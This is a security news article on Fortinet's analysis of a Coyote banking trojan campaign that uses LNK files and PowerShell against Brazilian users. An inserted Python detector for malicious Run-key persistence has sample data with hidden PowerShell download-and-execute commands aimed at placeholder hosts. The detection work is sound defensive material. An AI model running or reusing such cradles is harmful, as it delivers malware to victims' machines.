Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote.
"Once deployed, the Coyote banking trojan can carry out various malicious activities, including keylogging, capturing screenshots and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week.
The cybersecurity company said it has identified, over the past month, several Windows shortcut (LNK) file artifacts containing PowerShell commands responsible for delivering the malware.
Coyote was first documented by Kaspersky in early 2024, which detailed its attacks on users in the South American country. It is capable of harvesting sensitive information from more than 70 financial applications.
In the earlier attack chain recorded by the Russian cybersecurity firm, a Squirrel installer executable is used to launch a Node.js application compiled with Electron, which in turn runs a Nim-based loader to trigger execution of the malicious Coyote payload.
The latest infection sequence, on the other hand, begins with an LNK file that executes a PowerShell command to retrieve the next stage from a remote server ("tbet.gontrigame"): another PowerShell script, which launches a loader responsible for executing an interim payload.
"The injected code uses Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads," Lin said.
"If found, it deletes the existing entry and creates a new one with a randomly generated name. This new entry contains a customized PowerShell command pointing to the download and execution of a Base64-encoded URL."
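A defender-side check for the persistence mechanism described above, added here as an example and not part of Fortinet's analysis: it scans Run-key values for PowerShell launchers that hide a URL in Base64 under a random-looking value name. The value names, command lines and example.invalid hosts are constructed samples; in practice the mapping would be fed from `reg query` output or a registry export.

```python
import base64
import re

# Constructed sample Run-key values (value name -> command data), not real telemetry;
# hosts use the reserved example.invalid domain as a placeholder for the real server.
def _b64(text, enc="utf-8"):
    return base64.b64encode(text.encode(enc)).decode()

SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    # Random-looking name plus a download cradle whose URL is hidden as Base64 (UTF-8).
    "Xq7kd2Lm": "powershell.exe -w hidden -c \"iex (iwr ([Text.Encoding]::UTF8.GetString("
                "[Convert]::FromBase64String('" + _b64("http://example.invalid/stage") + "'))))\"",
    # -EncodedCommand carries Base64 of UTF-16LE text, so the decoder must try that too.
    "Updater": "powershell -nop -enc " + _b64("IEX (IWR http://example.invalid/b)", "utf-16-le"),
}

POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\b|FromBase64String", re.I)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"""https?://[^\s)"']+""", re.I)
RANDOM_NAME = re.compile(r"^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{6,16}$")

def decoded_strings(cmd):
    """Yield plausible plaintexts for each Base64-looking token, as UTF-8 and UTF-16LE."""
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid Base64, skip it
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                yield raw.decode(enc)
            except UnicodeDecodeError:
                continue

def assess(name, cmd):
    """Reasons a Run entry resembles a PowerShell download cradle; empty list if benign."""
    reasons = []
    if not POWERSHELL.search(cmd):
        return reasons
    if ENCODED.search(cmd):
        reasons.append("encoded/base64 payload in command line")
    for text in decoded_strings(cmd):
        if (m := URL.search(text)):
            reasons.append("decoded URL: " + m.group(0))
            break
    if reasons and RANDOM_NAME.match(name):
        reasons.append("random-looking value name")
    return reasons

def suspicious_run_entries(entries):
    # Keep only the {name: command} entries that produced at least one reason.
    return {n: r for n, c in entries.items() if (r := assess(n, c))}
```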
Upon launch, the malware collects basic system information and the list of antivirus products installed on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also carries out various checks to evade detection by sandboxes and virtual environments.
A notable change in Coyote's latest iteration is the expansion of its target list to cover 1,030 sites and 73 financial agents, such as mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, ustoshotel.com.br, blumenhotelboutique.com.br and fallshotel.com.br.
Should the victim attempt to access any of the sites on the list, the malware reaches out to an attacker-controlled server to determine the next course of action, which can range from capturing a screenshot to serving overlays. Other functions include keylogging and manipulating display settings.
"The Coyote infection process is complex and multi-staged," Lin said. "This attack used an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its original targets."